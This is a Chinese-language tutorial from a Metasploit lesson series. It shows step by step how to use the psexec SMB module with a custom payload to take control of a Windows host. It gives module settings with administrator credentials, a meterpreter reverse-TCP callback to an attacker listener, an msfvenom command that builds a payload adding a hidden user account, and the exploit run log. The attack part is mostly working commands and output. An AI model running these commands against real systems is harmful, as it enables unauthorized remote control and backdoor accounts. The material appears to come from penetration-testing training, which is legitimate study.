MSF的exploit模块下是支持set payload的,同样在复杂的网络环境下,许多模块也同样支持自定义的payload。可以更好的配合第三方框架,如第十一课中提到的Veil-Evasion等。

    以exploit/windows/smb/psexec为demo。

    攻击机配置如下:

    1. msf exploit(windows/smb/psexec) > show options
    2. Module options (exploit/windows/smb/psexec):
    3. Name Current Setting Required Description
    4. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
    5. RHOST 192.168.1.119 yes The target address
    6. RPORT 445 yes The SMB service port (TCP)
    7. SERVICE_DESCRIPTION no Service description to to be used on target fo rpretty listing
    8. SERVICE_DISPLAY_NAME no The service display name
    9. SERVICE_NAME no The service name
    10. SHARE ADMIN\$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
    11. SMBDomain . no The Windows domain to use for authentication
    12. SMBPass 123456 no The password for the specified username
    13. SMBUser administrator no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp):
    14. Name Current Setting Required Description
    15. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
    16. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
    17. LHOST 192.168.1.5 yes The listen address (an interface may be specified)
    18. LPORT 53 yes The listen port
    19. Exploit target:
    20. Id Name
    21. ‐‐ ‐‐‐‐
    22. 0 Automatic

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图1

    需设置一非,常用选项:

    1. msf exploit(windows/smb/psexec) > set EXE::CUSTOM /var/www/html/bin_tcp_x86_53.exe
    2. EXE::CUSTOM => /var/www/html/bin_tcp_x86_53.exe

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图2

    靶机当前端口如下:

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图3

    攻击机执行:

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图4

    靶机端口变化如下:

    虽报错,但并不影响执行。

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图5

    注意:

    Psexec创建一个服务后,来运行可执行文件(如Micropoor.exe)。但是将可执行文件作为服务,payload必须接受来自控制管理器的命令,否则将会执行失败。而psexec创建服务后,将随之停止,该payload处于挂起模式。

    参考该服务源码:

    https://github.com/rapid7/metasploit-framework/blob/master/data/templates/src/pe/exe/service/service.c

    payload启动后,将会在过一段时间内退出。并强制终止。

    故该参数一般用于adduser。配合adduser_payload。或者配合一次性执行完毕非常连接的payload。如下载。抓明文密码等。不适合需长连接通信的payload。

    1. root@John:/tmp# msfvenom ‐p windows/adduser PASS=Micropoor$123 USER=Micropoor ‐f exe >adduser.exe
    2. [‐] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    3. [‐] No arch selected, selecting arch: x86 from the payload
    4. No encoder or badchars specified, outputting raw payload
    5. Payload size: 279 bytes
    6. Final size of exe file: 73802 bytes

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图6

    同样可以配合target的改变来解决控制管理器的强制命令接收。

    攻击机设置:

    1. msf exploit(windows/smb/psexec) > show targets
    2. Exploit targets:
    3. Id Name
    4. ‐‐ ‐‐‐‐
    5. 0 Automatic
    6. 1 PowerShell
    7. 2 Native upload
    8. 3 MOF upload
    9. msf exploit(windows/smb/psexec) > set target 2
    10. target => 2
    11. msf exploit(windows/smb/psexec) > exploit
    12. [*] Started reverse TCP handler on 192.168.1.5:53
    13. [*] 192.168.1.119:445 Connecting to the server...
    14. [*] 192.168.1.119:445 Authenticating to 192.168.1.119:445 as user 'administrator'...
    15. [*] 192.168.1.119:445 Uploading payload... kKwZpPRs.exe
    16. [*] 192.168.1.119:445 Using custom payload /var/www/html/bin_tcp_x86\_53.exe, RHOST and RPORT settings will be ignored!
    17. [*] 192.168.1.119:445 Created kKwZpPRs.exe...
    18. [‐] 192.168.1.119:445 Unable to remove the service, ERROR_CODE:
    19. [‐] 192.168.1.119:445 Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_PIPE_EMPTY
    20. [*] Exploit completed, but no session was created.

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图7

    目标机:

    第九十七课:MSF配置自定义Payload控制目标主机权限 - 图8

    在执行payload即可。

    Micropoor